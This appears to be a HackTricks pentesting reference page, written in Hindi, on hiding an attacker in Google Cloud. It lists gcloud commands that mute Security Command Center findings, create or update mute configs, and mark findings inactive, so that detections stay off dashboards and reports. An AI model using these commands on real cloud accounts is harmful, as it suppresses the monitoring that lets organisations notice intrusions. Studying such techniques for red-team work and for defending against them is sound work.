GCP - Security Post Exploitation

HackTricks को समर्थन दें

Security

अधिक जानकारी के लिए देखें:

GCP - Security Enum

securitycenter.muteconfigs.create

एक muteconfig बनाकर उन findings की generation को रोकें जो एक attacker का पता लगा सकते हैं:

# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.muteconfigs.update

एक muteconfig को अपडेट करके एक हमलावर का पता लगाने वाले निष्कर्षों की पीढ़ी को रोकें:

# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.findings.bulkMuteUpdate

फिल्टर के आधार पर निष्क्रिय करें:

# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""

एक म्यूटेड फाइंडिंग SCC डैशबोर्ड और रिपोर्ट में नहीं दिखाई देगी।

securitycenter.findings.setMute

स्रोत, फाइंडिंग्स के आधार पर म्यूट फाइंडिंग्स...

gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED

securitycenter.findings.update

किसी त्रुटिपूर्ण जानकारी को इंगित करने के लिए एक finding को अपडेट करें:

gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
HackTricks को समर्थन दें

Last updated